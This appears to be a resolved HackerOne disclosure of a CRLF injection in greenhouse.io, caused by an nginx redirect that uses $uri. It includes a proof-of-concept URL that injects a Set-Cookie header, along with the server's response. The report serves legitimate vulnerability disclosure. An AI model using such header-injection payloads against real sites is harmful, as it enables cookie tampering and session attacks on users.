[greenhouse.io] CRLF Injection / Insecure nginx configuration
Unknown
Vulnerability Details
PoC
http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io
HTTP Response:
Location: http://www.greenhouse.io/
Set-Cookie:test=test;domain=.greenhouse.io
Result:
Creating cookie test=test on .greenhouse.io
$uri or $document_uri is used in the redirection-URL.
Actions
View on HackerOneReport Stats
- Report ID: 25275
- State: Closed
- Substate: resolved
- Upvotes: 7